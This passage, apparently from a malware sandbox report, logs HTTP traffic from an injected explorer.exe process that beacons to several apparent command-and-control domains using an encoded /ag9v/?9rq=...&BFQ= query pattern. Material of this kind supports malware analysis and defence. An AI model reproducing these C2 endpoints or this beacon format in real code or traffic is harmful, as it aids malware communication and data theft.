73 50 6c 35 30 72 63 73 6a 50 43 6d 68 66 66 30 42 32 63 51 4e 53 44 39 58 4e 48 6c 7a 75 41 6b 7a 33 74 57 79 31 74 7a 33 67 6e 73 76 32 49 49 33 4f 4b 66 58 77 26 61 6d 70 3b 42 46 51 3d 35 6a 49 30 6a 68 4d 48 41 30 68 78 5f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.marunouchi1.com/ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49814	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 07:29:51.188764095 CEST	5497	OUT	GET /ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_ HTTP/1.1 Host: www.psychedeliccosmetics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 14, 2021 07:29:51.303333044 CEST	5497	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 14 Oct 2021 05:29:51 GMT Content-Type: text/html Content-Length: 275 ETag: "615f93b1-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49818	151.106.117.36	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 07:29:56.615066051 CEST	5654	OUT	GET /ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_ HTTP/1.1 Host: www.aceserial.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 14, 2021 07:29:57.113888025 CEST	6010	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Thu, 14 Oct 2021 05:29:57 GMT Content-Length: 13724 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20 Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-align: center;} .link {margin-top: 40px;}
Oct 14, 2021 07:29:57.113965988 CEST	6011	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 7b 6d 61 72 67 69 6e 3a 20 38 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 20 31 30 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 Data Ascii: .sk-circle {margin: 80px auto;width: 100px;height: 100px;position: relative;} .sk-circle .sk-child {width: 100%;height: 100%;position: absolute;left: 0;top: 0;} .sk-circle .sk-child:before {content: '';displa
Oct 14, 2021 07:29:57.114002943 CEST	6012	IN	Data Raw: 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 31 30 64 65 67 29 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 39 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a Data Ascii: ransform: rotate(210deg); } .sk-circle .sk-circle9 {-webkit-transform: rotate(240deg);-ms-transform: rotate(240deg);transform: rotate(240deg); } .sk-circle .sk-circle10 {-webkit-transform: rotate(270deg);-ms-transform:
Oct 14, 2021 07:29:57.114037037 CEST	6014	IN	Data Raw: 73 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 31 30 3a 62 65 66 6f 72 65 20 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 73 3b 61 6e Data Ascii: s; } .sk-circle .sk-circle10:before {-webkit-animation-delay: -0.3s;animation-delay: -0.3s; } .sk-circle .sk-circle11:before {-webkit-animation-delay: -0.2s;animation-delay: -0.2s; } .sk-circle .sk-circle12:
Oct 14, 2021 07:29:57.114078999 CEST	6015	IN	Data Raw: 2a 20 39 29 20 2b 20 31 29 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 72 2e 70 75 73 68 28 61 72 72 5b 30 5d 20 2a 20 61 72 72 5b 31 5d 20 2a 20 61 72 72 5b 32 5d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 20 Data Ascii: * 9) + 1)]; arr.push(arr[0] * arr[1] * arr[2]); d = new Date().getTime(); arr = []; b = navigator.appName; div1 = document.createElement('div'); di
Oct 14, 2021 07:29:57.114115953 CEST	6017	IN	Data Raw: 6c 65 2e 6c 65 6e 67 74 68 29 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 65 78 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: le.length)); return text; } (function () { var a = function () { try { return !!window.addEventListener } cat
Oct 14, 2021 07:29:57.114142895 CEST	6018	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 69 72 63 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: <div class="sk-circle"> <div class="sk-circle1 sk-child"></div> <div class="sk-circle2 sk-child"></div> <div class="sk-cir
Oct 14, 2021 07:29:57.114168882 CEST	6019	IN	Data Raw: 73 68 22 20 76 61 6c 75 65 3d 22 36 33 62 32 61 66 34 34 66 65 63 34 65 61 34 61 66 32 39 31 34 37 31 34 35 61 33 31 32 65 38 35 32 63 66 37 38 31 64 32 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: sh" value="63b2af44fec4ea4af29147145a312e852cf781d2"/> <input type="hidden" name="origin_url" value="/ag9v/"/> </form> </div> <div class="link">
Oct 14, 2021 07:29:57.114192963 CEST	6021	IN	Data Raw: 71 63 6f 6e 74 61 63 74 73 2f 20 3c 2f 61 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 27 69 6e 64 65 78 2e 70 68 70 3f 6f 70 74 69 6f 6e 3d 63 6f 6d 5f 6a 65 76 65 6e 74 73 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 61 62 Data Ascii: qcontacts/ </a><br><a href='index.php?option=com_jevents'>This contact form is about /components/com_jevents/ </a><br><a href='index.php?option=com_contact'>This contact form is about /components/com_contact/ </a><br><a href='index.php?opti
Oct 14, 2021 07:29:57.114217997 CEST	6022	IN	Data Raw: 2e 70 68 70 3f 70 61 72 61 6d 3d 68 6f 6e 65 79 22 3e 47 48 44 42 20 53 69 67 6e 61 74 75 72 65 20 23 37 33 33 20 28 26 71 75 6f 74 3b 45 6e 74 65 72 20 69 70 26 71 75 6f 74 3b 20 69 6e 75 72 6c 3a 26 71 75 6f 74 3b 70 68 70 2d 70 69 6e 67 2e 70 Data Ascii: .php?param=honey">GHDB Signature #733 ("Enter ip" inurl:"php-ping.php")</a><br><br><a href="demo/GHH%20-%20PHP%20Shell/phpshell.php?param=honey">GHDB Signature #365 (intitle:"PHP Shell *" "Enable stderr&quo
Oct 14, 2021 07:29:57.114244938 CEST	6023	IN	Data Raw: 75 64 64 79 6c 69 73 74 22 29 3c 2f 61 3e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 64 65 6d 6f 2f 3f 47 48 48 20 76 31 2e 31 20 2d 20 46 69 6c 65 20 55 70 6c 6f 61 64 20 4d 61 6e 61 67 65 72 2f 22 3e 47 48 44 42 20 53 69 67 6e Data Ascii: uddylist")</a> <br><br><a href="/demo/?GHH v1.1 - File Upload Manager/">GHDB Signature #734 ("File Upload Manager v1.3" "rename to")</a> <br><br><a href="/demo/?GHH v1.1 - passlist.txt/passlist.txt">GHDB Signature #58 (inurl:passlist.txt)</a

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49841	104.21.2.218	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 07:30:12.290184021 CEST	6071	OUT	GET /ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_ HTTP/1.1 Host: www.ebookgratis.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 14, 2021 07:30:12.313358068 CEST	6072	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 14 Oct 2021 05:30:12 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Thu, 14 Oct 2021 06:30:12 GMT Location: https://www.ebookgratis.online/ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uxw1tsnKlgtB7W5LJtTa5eumSOBk%2BN%2BrDmS98GeIS3mtBU2HXDQ%2Buox4Xes1rOEFZ77hnABAYNvD5o6qlHscVIs9wqr%2BP69MQSOAASVdvEX0AMzTjdkTFWFC%2Fhu%2FOO1BvKLiRR5n%2F3t9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69de6a12dc6a5b6e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49842	199.59.242.153	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 07:30:17.527385950 CEST	6073	OUT	GET /ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_ HTTP/1.1 Host: www.ovmfinacial.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 14, 2021 07:30:17.628267050 CEST	6074	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 14 Oct 2021 05:30:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: parking_session=927c3a40-3c29-567c-15c2-72d0a3410220; expires=Thu, 14-Oct-2021 05:45:17 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_j7GpDLGaTLJ0rhGNdo+VonizNelzx47mFEL9iz/Okv4QD4XHqfn9OfxM1Dhs8JbXoG2B2KZhqWK371CGAnlIig== Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 35 38 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 37 47 70 44 4c 47 61 54 4c 4a 30 72 68 47 4e 64 6f 2b 56 6f 6e 69 7a 4e 65 6c 7a 78 34 37 6d 46 45 4c 39 69 7a 2f 4f 6b 76 34 51 44 34 58 48 71 66 6e 39 4f 66 78 4d 31 44 68 73 38 4a 62 58 6f 47 32 42 32 4b 5a 68 71 57 4b 33 37 31 43 47 41 6e 6c 49 69 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 62 6f 64 69 73 63 64 6e 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 20 63 72 6f 73 73 Data Ascii: 589<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_j7GpDLGaTLJ0rhGNdo+VonizNelzx47mFEL9iz/Okv4QD4XHqfn9OfxM1Dhs8JbXoG2B2KZhqWK371CGAnlIig=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin><link rel="dns-prefetch" href="https://fonts.googleapis.com" cross
Oct 14, 2021 07:30:17.628300905 CEST	6075	IN	Data Raw: 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 Data Ascii: origin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiOTI3YzNhNDAtM2MyOS01NjdjLTE1YzItNzJkMGEzNDEwMjIwIiwicGFnZV90aW1lIjoxNjM0MTg5NDE3LCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy5vdm1maW5hY2lhbC5jb21cL2FnOXZcLz
Oct 14, 2021 07:30:17.628323078 CEST	6075	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49847	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 07:30:28.510090113 CEST	6097	OUT	GET /ag9v/?9rq=K9/CDnPG5wdyl4CHzmgShg3gLBJ4YNT1Y6jAhZ/FXp8/egWH1BEUOuCtjJEICRxztW+Z&BFQ=5jI0jhMHA0hx_ HTTP/1.1 Host: www.dollpartyla.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 14, 2021 07:30:28.557862997 CEST	6099	IN	HTTP/1.1 403 Forbidden Date: Thu, 14 Oct 2021 05:30:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 189 X-Sorting-Hat-ShopId: 59880997054 X-Request-ID: ff951e54-78cb-49de-931e-6e9b39ead4a9 X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Content-Type-Options: nosniff X-Dc: gcp-europe-west1 CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 69de6a78386b698b-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col
